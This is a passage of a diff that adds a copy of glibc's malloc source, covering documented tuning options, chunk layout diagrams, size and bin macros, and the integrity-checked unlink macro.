+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
